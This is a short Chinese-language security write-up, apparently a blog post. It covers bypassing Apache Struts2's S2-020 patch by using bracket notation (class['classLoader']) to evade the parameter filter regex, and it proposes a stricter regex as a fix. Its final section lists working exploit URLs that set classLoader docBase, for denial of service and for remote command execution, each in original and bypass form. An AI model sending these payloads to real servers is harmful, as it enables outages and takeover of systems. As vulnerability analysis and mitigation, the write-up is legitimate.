Struts2 S2-020补丁绕过漏洞
0×00 背景
安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。
0×01 分析
Struts2 S2-020 中加入 (.*\.|^)class\..* 来过滤action参数。然而最近翰海源报告了一种绕过方法(http://blog.vulnhunt.com/index.php/2014/04/24/apache_struts2_0day/),使用class['classLoader']来代替class.classloader绕过正则表达式,从而完全绕过S2-020的补丁。
翰海源提出较为严格的临时解决方案,替换所有的 ^dojo\..* 改为 (.*\.|^)class.*,^dojo\..*
因此过滤所有class开头和包含.class的action参数。显然这个解决方案不够完美,我觉得替换成
(.*\.|^)class(\.|('|")]|\[).*,^dojo\..*
才好,只过滤class开头且后面为. [ "] '] 形式的参数。
Done!
0x02 利用
DDOS原利用方法:
http://www.domain.com/index.action?class.classLoader.resources.dirContext.docBase=不存在的路径
绕过方法:
http://www.domain.com/index.action?class['classLoader']['resources']['dirContext']['docBase']=不存在的路径
远程命令执行原利用方法:
http://www.domain.com/index.action?class.classLoader.resources.dirContext.docBase=映射主机共享目录
绕过方法:
http://www.domain.com/index.action?class['classLoader']['resources']['dirContext']['docBase']=映射主机共享目录